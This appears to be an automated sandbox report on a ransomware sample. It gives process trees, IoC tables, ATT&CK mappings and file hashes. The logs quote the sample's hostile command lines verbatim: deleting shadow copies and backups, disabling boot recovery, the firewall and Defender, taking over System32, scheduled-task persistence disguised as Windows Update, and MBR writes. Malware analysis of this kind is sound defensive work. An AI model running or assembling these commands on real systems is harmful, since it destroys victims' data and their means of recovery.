4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe

Suspicious use of SendNotifyMessage 27 IoCs

Processes:

chrome.exefirefox.exe

pid	process
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
4876	chrome.exe
1556	firefox.exe
1556	firefox.exe
1556	firefox.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

firefox.exeiexplore.exeIEXPLORE.EXE

pid	process
1556	firefox.exe
5116	iexplore.exe
5116	iexplore.exe
4512	IEXPLORE.EXE
4512	IEXPLORE.EXE
5116	iexplore.exe
4512	IEXPLORE.EXE
4512	IEXPLORE.EXE
5116	iexplore.exe
5116	iexplore.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

slamransomware2.1.execmd.exeslam.execmd.exelo.execmd.exeWindowsFormsApp1.execmd.exembr.execmd.exe

description	pid	process	target process
PID 3064 wrote to memory of 4908	3064	slamransomware2.1.exe	cmd.exe
PID 3064 wrote to memory of 4908	3064	slamransomware2.1.exe	cmd.exe
PID 3064 wrote to memory of 4908	3064	slamransomware2.1.exe	cmd.exe
PID 4908 wrote to memory of 2224	4908	cmd.exe	uac.exe
PID 4908 wrote to memory of 2224	4908	cmd.exe	uac.exe
PID 4908 wrote to memory of 2224	4908	cmd.exe	uac.exe
PID 1980 wrote to memory of 4416	1980	slam.exe	cmd.exe
PID 1980 wrote to memory of 4416	1980	slam.exe	cmd.exe
PID 1980 wrote to memory of 4416	1980	slam.exe	cmd.exe
PID 4416 wrote to memory of 4712	4416	cmd.exe	lector_mbr.exe
PID 4416 wrote to memory of 4712	4416	cmd.exe	lector_mbr.exe
PID 4416 wrote to memory of 4712	4416	cmd.exe	lector_mbr.exe
PID 4416 wrote to memory of 4564	4416	cmd.exe	lo.exe
PID 4416 wrote to memory of 4564	4416	cmd.exe	lo.exe
PID 4416 wrote to memory of 4492	4416	cmd.exe	netsh.exe
PID 4416 wrote to memory of 4492	4416	cmd.exe	netsh.exe
PID 4416 wrote to memory of 4492	4416	cmd.exe	netsh.exe
PID 4564 wrote to memory of 1376	4564	lo.exe	cmd.exe
PID 4564 wrote to memory of 1376	4564	lo.exe	cmd.exe
PID 1376 wrote to memory of 204	1376	cmd.exe	takeown.exe
PID 1376 wrote to memory of 204	1376	cmd.exe	takeown.exe
PID 1376 wrote to memory of 188	1376	cmd.exe	icacls.exe
PID 1376 wrote to memory of 188	1376	cmd.exe	icacls.exe
PID 4564 wrote to memory of 4068	4564	lo.exe	WindowsFormsApp1.exe
PID 4564 wrote to memory of 4068	4564	lo.exe	WindowsFormsApp1.exe
PID 4564 wrote to memory of 4068	4564	lo.exe	WindowsFormsApp1.exe
PID 4416 wrote to memory of 4844	4416	cmd.exe	netsh.exe
PID 4416 wrote to memory of 4844	4416	cmd.exe	netsh.exe
PID 4416 wrote to memory of 4844	4416	cmd.exe	netsh.exe
PID 4068 wrote to memory of 4724	4068	WindowsFormsApp1.exe	cmd.exe
PID 4068 wrote to memory of 4724	4068	WindowsFormsApp1.exe	cmd.exe
PID 4068 wrote to memory of 4724	4068	WindowsFormsApp1.exe	cmd.exe
PID 4068 wrote to memory of 1600	4068	WindowsFormsApp1.exe	mbr.exe
PID 4068 wrote to memory of 1600	4068	WindowsFormsApp1.exe	mbr.exe
PID 4068 wrote to memory of 1600	4068	WindowsFormsApp1.exe	mbr.exe
PID 4068 wrote to memory of 660	4068	WindowsFormsApp1.exe	cmd.exe
PID 4068 wrote to memory of 660	4068	WindowsFormsApp1.exe	cmd.exe
PID 4068 wrote to memory of 660	4068	WindowsFormsApp1.exe	cmd.exe
PID 4724 wrote to memory of 2552	4724	cmd.exe	takeown.exe
PID 4724 wrote to memory of 2552	4724	cmd.exe	takeown.exe
PID 4724 wrote to memory of 2552	4724	cmd.exe	takeown.exe
PID 1600 wrote to memory of 2388	1600	mbr.exe	schtasks.exe
PID 1600 wrote to memory of 2388	1600	mbr.exe	schtasks.exe
PID 1600 wrote to memory of 2388	1600	mbr.exe	schtasks.exe
PID 660 wrote to memory of 3788	660	cmd.exe	vssadmin.exe
PID 660 wrote to memory of 3788	660	cmd.exe	vssadmin.exe
PID 660 wrote to memory of 3788	660	cmd.exe	vssadmin.exe
PID 4724 wrote to memory of 4956	4724	cmd.exe	icacls.exe
PID 4724 wrote to memory of 4956	4724	cmd.exe	icacls.exe
PID 4724 wrote to memory of 4956	4724	cmd.exe	icacls.exe
PID 660 wrote to memory of 4236	660	cmd.exe	WMIC.exe
PID 660 wrote to memory of 4236	660	cmd.exe	WMIC.exe
PID 660 wrote to memory of 4236	660	cmd.exe	WMIC.exe
PID 4416 wrote to memory of 4964	4416	cmd.exe	netsh.exe
PID 4416 wrote to memory of 4964	4416	cmd.exe	netsh.exe
PID 4416 wrote to memory of 4964	4416	cmd.exe	netsh.exe
PID 4416 wrote to memory of 1752	4416	cmd.exe	netsh.exe
PID 4416 wrote to memory of 1752	4416	cmd.exe	netsh.exe
PID 4416 wrote to memory of 1752	4416	cmd.exe	netsh.exe
PID 4416 wrote to memory of 2080	4416	cmd.exe	netsh.exe
PID 4416 wrote to memory of 2080	4416	cmd.exe	netsh.exe
PID 4416 wrote to memory of 2080	4416	cmd.exe	netsh.exe
PID 4416 wrote to memory of 3032	4416	cmd.exe	reg.exe
PID 4416 wrote to memory of 3032	4416	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\slamransomware2.1.exe
"C:\Users\Admin\AppData\Local\Temp\slamransomware2.1.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\66EC.tmp\slamloader.bat" "C:\Users\Admin\AppData\Local\Temp\slamransomware2.1.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:4908

C:\temp\uac.exe
uac.exe 34 C:\temp\slam.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2224

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4184

C:\temp\slam.exe
"C:\temp\slam.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D8B1.tmp\slam.bat" "C:\temp\slam.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:4416

C:\temp\lector_mbr.exe
lector_mbr.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
PID:4712

C:\temp\lo.exe
lo.exe
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4564

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"
4⤵
- Suspicious use of WriteProcessMemory
PID:1376

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:204

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32 /grant "Admin:F"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:188

C:\temp\WindowsFormsApp1.exe
"C:\temp\WindowsFormsApp1.exe"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4068

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"
5⤵
- Suspicious use of WriteProcessMemory
PID:4724

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2552

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant "Admin:F"
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4956

C:\temp\mbr.exe
"C:\temp\mbr.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
PID:1600

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\temp\mbr.exe"
6⤵
- Creates scheduled task(s)
PID:2388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
5⤵
- Suspicious use of WriteProcessMemory
PID:660

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
6⤵
- Interacts with shadow copies
PID:3788

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4236

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state off
3⤵
- Modifies Windows Firewall
PID:4492

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
3⤵
- Modifies Windows Firewall
PID:4844

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set domainprofile state off
3⤵
- Modifies Windows Firewall
PID:4964

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set privateprofile state off
3⤵
- Modifies Windows Firewall
PID:1752

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set publicprofile state off
3⤵
- Modifies Windows Firewall
PID:2080

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
3⤵
PID:3032

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
- Modifies registry key
PID:3648

C:\Windows\SysWOW64\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
3⤵
PID:4948

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /t REG_DWORD /d 2 /f
3⤵
- Modifies registry key
PID:3168

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3976

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:4876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd29a24f50,0x7ffd29a24f60,0x7ffd29a24f70
2⤵
PID:2116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1596 /prefetch:2
2⤵
PID:2564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1680 /prefetch:8
2⤵
PID:1104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2132 /prefetch:8
2⤵
PID:5052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
2⤵
PID:1488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2588 /prefetch:1
2⤵
PID:4396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
2⤵
PID:4800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4236 /prefetch:8
2⤵
PID:3900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4716 /prefetch:8
2⤵
PID:4240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4904 /prefetch:8
2⤵
PID:2872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4892 /prefetch:8
2⤵
PID:3540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:8
2⤵
PID:4884

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5128 /prefetch:8
2⤵
PID:4224

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:8
2⤵
PID:4248

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4760 /prefetch:8
2⤵
PID:4896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4824 /prefetch:8
2⤵
PID:4652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
2⤵
PID:2620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=848 /prefetch:8
2⤵
PID:1592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 /prefetch:8
2⤵
PID:2616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=776 /prefetch:8
2⤵
PID:4072

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2488 /prefetch:8
2⤵
PID:3160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4064 /prefetch:8
2⤵
PID:3788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4992 /prefetch:8
2⤵
PID:3952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 /prefetch:8
2⤵
PID:4336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2436 /prefetch:8
2⤵
PID:2300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4060 /prefetch:2
2⤵
PID:2548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2404 /prefetch:8
2⤵
PID:4680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4948 /prefetch:8
2⤵
PID:4372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:8
2⤵
PID:2124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1360 /prefetch:8
2⤵
PID:2952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3964 /prefetch:8
2⤵
PID:3760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4248 /prefetch:8
2⤵
PID:5084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5092 /prefetch:8
2⤵
PID:4792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5128 /prefetch:8
2⤵
PID:1756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4800 /prefetch:8
2⤵
PID:4976

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:1460

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1556

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.0.1683401816\490683855" -parentBuildID 20200403170909 -prefsHandle 1548 -prefMapHandle 1540 -prefsLen 1 -prefMapSize 220115 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 1628 gpu
3⤵
PID:4552

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.3.1904026127\1951183869" -childID 1 -isForBrowser -prefsHandle 2224 -prefMapHandle 2220 -prefsLen 156 -prefMapSize 220115 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 2236 tab
3⤵
PID:4576

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.13.1490602068\8265539" -childID 2 -isForBrowser -prefsHandle 3416 -prefMapHandle 3412 -prefsLen 6938 -prefMapSize 220115 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 3428 tab
3⤵
PID:2996

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5116

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5116 CREDAT:82945 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4512

C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"
1⤵
- Drops file in Program Files directory
PID:4792

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\ChromeRecovery.exe
"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={7711465a-bc55-4bce-8d53-e737ac179a98} --system
2⤵
- Executes dropped EXE
PID:4308

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\ChromeRecovery.exe
Filesize
253KB

MD5
49ac3c96d270702a27b4895e4ce1f42a

SHA1
55b90405f1e1b72143c64113e8bc65608dd3fd76

SHA256
82aa3fd6a25cda9e16689cfadea175091be010cecae537e517f392e0bef5ba0f

SHA512
b62f6501cb4c992d42d9097e356805c88ac4ac5a46ead4a8eee9f8cbae197b2305da8aab5b4a61891fe73951588025f2d642c32524b360687993f98c913138a0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize
471B

MD5
ceb27c5a4ddfb187c4249a72504c7c8e

SHA1
